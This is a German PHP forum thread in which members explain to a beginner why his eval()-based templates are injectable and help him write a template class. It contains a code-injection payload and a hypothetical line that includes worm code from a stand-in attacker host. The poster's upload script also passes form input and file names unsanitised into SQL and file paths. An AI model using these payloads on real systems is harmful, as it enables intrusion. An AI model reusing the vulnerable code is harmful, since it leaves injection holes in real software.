[Vorstellung] tHE fAKE pAGE!

[Manni]

Ich benutze ebenfalls eval() für meine Templates aus Performancegründen. Allerdings wird der komplettte Code von meiner Template-Engine generiert und es kann nirgendwo direkt PHP Code eingeschleust werden (Es sei denn, jemand verändert die gecachten Templatedateien, dann liegt allerdings beim System grundsätzlich was falsch )

Die möglicherweise sicherere Alternative ist in der Tat, alles über Objekte und Methoden zu regeln, dann kann auch nirgendwo PHP-Code eingeschleust werden - aber soweit ich weiß, ist ist OOP in PHP recht langsam...

Ein Beispiel für eine Sicherheitslücke in deinen Templates, wäre sowas:

Code:

\"; phpinfo(); //

Allerdings ist das ungetestet und inwiefern man etwas schlimmes damit anstellen kann ist unklar

[deadshox]

Also phpinfo() Funktioniert wenn ich es direkt in eval() eingebe aber wie soll ich von außen da ran kommen? Ich benutze ja keine Variablen in eval().

[Manni]

Das Problem ist, dass du nur Anführungszeichen escapest. Aus " wird also \". Wenn ich aber \" in einem String habe, wird \\" daraus. Damit ist nicht mehr das Anführungszeichen escaped, sondern der Slash - und der String ist zu Ende. Danach kann man beliebigen PHP Code ausführen.

Schreibe ich zum Beispiel folgendes in das Template:

Code:

\"; phpinfo(); //

Kommt in PHP folgendes raus:

PHP-Code:

$foo = "\\"; phpinfo(); //" 


Und was das bewirkt, kann man sich ja denken

[deadshox]

Hm ok das hab ich jetz verstanden nur wie komm ich an eval ran und kann so schaden verursachen? Das ist mir immer noch nicht begreiflich. ;(


Hab grade festgestellt das der Upload irgendwie nicht geht aber ich habe keinen Plan warum. -.-

Hier mal der Code:

PHP-Code:

$content =         "<p class=\"read\">".$lang['fake_rules']."! </p>";
$verz =         "gallery";
$info =         getimagesize($_FILES['file']['tmp_name']);
$filesize =     filesize($_FILES['file']['tmp_name']);
$form1 =         "\n<form enctype=\"multipart/form-data\" action=\"?main=add&amp;insert=true\" method=\"post\">";
$form2 =         "</form>";

    if (isset($_GET['insert']) == "true")
    {
        if (2 == $info[2] OR 3 == $info[2])
        {
            if (40960 >= $filesize)
            {
                if (move_uploaded_file($_FILES['file']['tmp_name'],$verz."/".$_FILES['file']['name']) AND entry($_GET['insert']) == "true")
                {
                    $query = "INSERT INTO ".$pref."fake (
                                    fake,
                                    faker,
                                    befake,
                                    password
                                ) 
                                VALUES (
                                    '".$_FILES['file']['name']."',
                                    '".$_POST['faker']."',
                                    '".$_POST['befake']."',
                                    '".md5($_POST['password'])."'
                                );";
                    $sql = mysql_query($query) or die(mysql_error());
                    
                    if (sql) $content =
                        "<p class=\"success\">".$lang['fake_upload_success']." <br />
                        - <a href=\"gallery/".$_FILES['file']['name']."\">".$_FILES['file']['name']."</a></p> \n
                        <p class=\"success\">".$lang['fake_new_success']."! </p>";
                }
                elseif (!is_uploaded_file($_FILES['file']['tmp_name']))
                {                
                    $content = "<p class=\"error\">".$lang['fake_upload_failed']."! </p>";
                }
            }
            else $content = "<p class=\"error\">".$lang['fake_badfile']."! </p>";
        }
        else $content = "<p class=\"error\">".$lang['fake_badfile']."! ".$info[2]." -- ".$filesize."</p>";
    }

eval("\$content .= \"".gettemplate("style/fake_new")."\";");
        
$htm_content =     $form1;
$htm_content .= $content;
$htm_content .= $form2; 


Er gibt auch nichts ueber $info[2] und $filesize aus. -.-
Irgendwie hab ich da nen Brett vorm Kopf.

[Jesus_666]

Hm ok das hab ich jetz verstanden nur wie komm ich an eval ran und kann so schaden verursachen? Das ist mir immer noch nicht begreiflich. ;(

...

Wir haben schon gezeigt, daß bestimmter PHP-Code aus deinen Templates heraus ausführbar ist, weil du nicht alles escapt hast, was gefährlich sein kann. Jetzt stell' dir vor, wir finden noch eine Escapelücke oder du verwendest später wieder eval() und paßt da nicht richtig auf. Dann müssen wir dir nur noch ein Template unterschieben, in dem irgendwo etwas in der Art von if (time() > 1185643219) include('http://evilserver.tld/worm_uploader.php') drin steht und ab dem 28.07.2007, 07:07:19 Uhr wird Schadcode von einer anderen Website eingebunden (die Zeitverzögerung macht den Angriff schwerer auf das Template zurückzuführen). Und nein, ein echter Angreifer würde nicht so offensichtlichen, plumpen Code schreiben.

Es geht hier darum, dir allgemein eval() abzugewöhnen. Jeder Programmierer macht Fehler und Fehler im Zusammenhang mit eval() neigen dazu, sicherheitstechnisch katastrophale Auswirkungen zu haben.

[deadshox]

Es geht hier darum, dir allgemein eval() abzugewöhnen. Jeder Programmierer macht Fehler und Fehler im Zusammenhang mit eval() neigen dazu, sicherheitstechnisch katastrophale Auswirkungen zu haben.

...

Gut ich sehs ja ein. ;]
Nun hab ich noch mal ne frage zu ' und ". Wann setz ich nu was ein? Finde irgendwie nix zum nachlesen da ich nicht weiß wonach ich suchen soll. ;[

[NPC Fighter]

Bei einfachen Anführungszeichen wird der Text einfach als solcher ausgegeben, bei doppelten übersetzt der Parser Variablen oder Ausdrücke.

PHP-Code:

<?php
$zustand = "gut";
echo "Mir gehts $zustand.\nDanke der Nachfrage.";
echo 'Mir gehts $zustand.\nDanke der Nachfrage.';
?>

Ausgabe beim ersten:

Code:

Mir gehts gut.
Danke der Nachfrage.

Ausgabe beim zweiten:

Code:

Mir gehts $zustand.\nDanke der Nachfrage.

Wenn du also nur Text ausgibst, empfehlen sich einfach Anführungszeichen, weils performanter ist.


Ach und btw. Es wäre mir recht, wenn du das ständige ";D / ;] / ;[ / ;) / ;(" etwa tausendmal pro Post unterlassen könntest; ab und an gehts ja und nix gegen Smilies im Allgemeinen, aber mit der Zeit gehts ehrlich gesagt etwas auf die Nerven.

[deadshox]

Sooo *trommelwirbel*

Hab nun meine Template Klasse Fertig.
Hab mich sehr bemueht es euch recht zu machen und ich hoffe das ist mir auch gelungen und ihr habt nix daran auszusetzen. Fehler und Verbesserungsvorschlaege sind trotzdem erwuenscht. ;]
Ich weiß es fehlt noch sowas wie "error" Handling, das kann ich ja Spaeter noch mit einbauen.

Download

Fuer die Windows Leute
Fuer die Linux Leute

Code

template.php

PHP-Code:

<?php
# Template Klasse! Selbstgemacht. WUHUHU!

class template
{
    var $tpl;
    var $tpls;

    function get_tpl($file)
    {
        $this->tpl = implode("", @file("$file"));
    }
    
    function get_tpls($file)
    {
        $this->tpls = implode("", @file("$file"));
    }
    
    function replace($search, $replace)
    {
        $this->tpl = str_replace("$search", "$replace", "$this->tpl");
    }
    
    function show_tpl()
    {
        echo $this->tpl;
    }
}
?>

index.php

PHP-Code:

<?php
# Template Test

# Einbinden der Template Klasse
include('template.php');

# Erzeugung des Objektes
$template = new template;

# Laden der HTML seite
$template->get_tpl('tpl_index.html');
# Laden einer Zweiten HTML seite.
$template->get_tpls('tpl_index2.html');

# Variablen. o.O
$title = 'Möp';
$content = 'MöpMöp';
$copyright = 'Pöm';
$subcontent = 'PömMöp';

# Austauschen der Platzhalter mit Variablen
$template->replace('{title}', "$title");
$template->replace('{content}', "$template->tpls"); #  Einbinden des Zweiten Templates
$template->replace('{subcontent}', "$subcontent"); # Variable aus dem Zweiten Template, kann wie alle anderen eingebunden werden
$template->replace('{copyright}', "$copyright");

# Ausgabe des Fertigen Templates!
$template->show_tpl();
?>

Viel Spaß damit.

[NPC Fighter]

Ich halte das

PHP-Code:

<?php
# Variablen. o.O
$title = 'Möp';
$content = 'MöpMöp';
$copyright = 'Pöm';
$subcontent = 'PömMöp';

# Austauschen der Platzhalter mit Variablen
$template->replace('{title}', "$title");
$template->replace('{content}', "$template->tpls"); #  Einbinden des Zweiten Templates
$template->replace('{subcontent}', "$subcontent"); # Variable aus dem Zweiten Template, kann wie alle anderen eingebunden werden
$template->replace('{copyright}', "$copyright");
?>

irgendwie für zu umständlich. Ich würde die Phrases mit Ersetzung in einer externen Datei auslagern und die Phrases außerdem in ein Assoziativarray stecken. Dann kannst du das bequem einbinden und in einer Schleife ersetzen lassen. Vermindert den Arbeitsaufwand beim Hinzufügen von neuen Phrases.


Edit: Japp, ich meinte es so, wie malu es ausgeführt hat. ^^

[mitaki]

Vor allem können Variablen auch verwendet werden, wenn sie nicht von Anführungszeichen umgeben sind.

PHP-Code:

$template->replace('{copyright}', "$copyright"); // X
$template->replace('{copyright}', $copyright); // O 


[deadshox]

@npc

PHP-Code:

<?php
# Variablen. o.O
$index = array
(
    array('{title}', 'Möp'),
    array('{copyright}', 'Pöm'),
    array('{subcontent}', 'PömMöp')
);

# Austauschen der Platzhalter mit Variablen
$template->replace('{content}', $template->tpls); #  Einbinden des Zweiten Templates

foreach ($index as $replace)
{
    $template->replace($replace[0], $replace[1]);
}
?>

So?

[malu]

Ich denke mit Assoziativarray meinte NPC eher sowas wie

PHP-Code:

$foobar = array(
'{title}' => 'Seitenamebla',
'{content}' => $template->tpls,
'{copyright}' => '1234 bla'); 


und dann eben

PHP-Code:

foreach($foobar as $search => $replace) {
$template->replace($search, $replace);
} 


oder so ähnlich.
Code ungetestet ._. Bitte nicht hauen

[deadshox]

@malu So hatte ich mir das anfangs auch vorgestellt wusste nur nicht wie ich es umsetzen sollte, probier es gleich mal aus.

PHP-Code:

<?php # Variablen. o.O
$index = array
(
    '{title}' => 'Möp',
    '{content}' => $template->tpls,
    '{subcontent}' => 'PömMöp',
    '{copyright}' => 'Pöm'
);

# Austauschen der Platzhalter mit Variablen
foreach ($index as $search => $replace)
{
    $template->replace($search, $replace);
}
?>

SO, klappt super, dank an euch!